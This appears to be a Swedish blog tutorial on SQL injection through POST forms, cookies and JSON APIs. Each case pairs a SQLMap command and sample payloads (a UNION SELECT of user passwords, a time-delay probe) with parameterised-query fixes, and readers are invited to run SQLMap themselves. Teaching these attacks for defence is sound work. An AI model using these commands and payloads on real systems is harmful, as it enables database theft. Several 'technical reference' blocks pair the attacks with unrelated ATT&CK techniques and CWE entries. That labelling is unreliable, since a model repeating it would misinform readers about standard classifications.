CWE: CWE-89 MITRE ATT&CK: T1190 Standard: OWASP Top 10 A03:2021
---
### âïž Fall 2: POST-parameter (formulĂ€r)
**Problem:** AnvĂ€ndardata skickas i bakgrunden via formulĂ€r â men Ă€r fortfarande sĂ„rbart!
*Liknelse:* Som ett hemligt kuvert som ÀndÄ kan öppnas och förfalskas under transport.
**Angreppssteg med SQLMap:**
```bash
sqlmap -u "http://target/case2.php" --data="id=1" --batch --dump
Vad hÀnder: SQLMap skickar POST-data med payloads som id=1' UNION SELECT password FROM users--
.
SkyddsÄtgÀrder (Node.js-exempel):
// AnvÀnd platshÄllare i databasfrÄgor
db.query("SELECT * FROM products WHERE id = ?", [req.body.id], (err, result) => {});
# âïž Teknisk referens
CWE: CWE-89
MITRE ATT&CK: T1071.1
Standard: OWASP API Security Top 10 API8:2023
đȘ Fall 3: Cookie-injektion #
Problem: Cookies verkar harmlösa â men kan bli en hemlig attackyta! VardagsjĂ€mförelse: Som att byta ut innehĂ„llet i ett “sĂ€kert” förseglat godis â utan att nĂ„gon mĂ€rker.
Angreppssteg med SQLMap:
sqlmap -u "http://target/case3.php" --cookie="id=1" --batch --dump
Vad hÀnder: SQLMap Àndrar cookien till t.ex. id=1' AND (SELECT * FROM users)='a
.
SkyddsÄtgÀrder (Python/Flask):
# Kontrollera cookie-vÀrden innan anvÀndning
user_id = validate_int(request.cookies.get('id'))
cursor.execute("SELECT name FROM users WHERE id = %s", (user_id,))
# đȘ Teknisk referens
CWE: CWE-565
MITRE ATT&CK: T1506
Standard: OWASP Session Management Cheat Sheet
đ§Ÿ Fall 4: JSON-baserad SQLi #
Problem: Moderna API:er anvĂ€nder JSON â men mĂ„nga glömmer sĂ€kra denna data! JĂ€mförelse: Som att skicka en förgiftad present i en fin, förgylld lĂ„da.
Angreppssteg med SQLMap:
sqlmap -u "http://target/case4.php" --data='{"id":1}' --headers="Content-Type: application/json" --batch
Vad hÀnder: SQLMap injicerar direkt i JSON-strukturen, t.ex. {"id":"1' WAITFOR DELAY '0:0:5'--"}
.
SkyddsÄtgÀrder (C#-exempel):
// AnvÀnd Entity Framework för automatiskt skydd
var product = dbContext.Products
.Where(p => p.Id == jsonInput.Id)
.FirstOrDefault();
# đŠ Teknisk referens
CWE: CWE-1236
MITRE ATT&CK: T1134.001
Standard: OWASP JSON Sanitization Guidelines
đ§ Skillnader i ett nötskal #
Position | Dataformat | SQLMap-flagga | RisknivÄ | |
---|---|---|---|---|
GET | Synlig i URL | ?id=1 |
-u |
ââââ |
POST | Gömd i formulÀr | id=1 |
--data |
âââ |
Cookie | HTTP-huvud | Cookie: id=1 |
--cookie |
ââ |
JSON | API-kropp | {"id":1} |
--data +--headers |
ââââ |
Gemensam grund: Samma typ av SQL-sĂ„rbarhet â men hur den nĂ„r fram avgör exploateringen! đŻ
đ Sammanfattning & Uppdrag #
SQL Injection Ă€r som vatten â det sipprar in genom minsta spricka! đ§ Oavsett om det sker via URL, formulĂ€r, cookies eller JSON, Ă€r botemedlet detsamma: parameterbundna frĂ„gor och strikt validering.
âš Ditt praktiska test:
- Installera SQLMap
- Kör
sqlmap -u "https://ditt-test-api/user?id=1" --batch
- Granska rapporten â hittar du nĂ„gra injektionspunkter?
“Att förstĂ„ angreppsmetoder Ă€r första steget mot ogenomtrĂ€ngliga system.” đ
Dela dina iakttagelser i kommentarerna â vilket angreppssĂ€tt överraskade dig mest? đ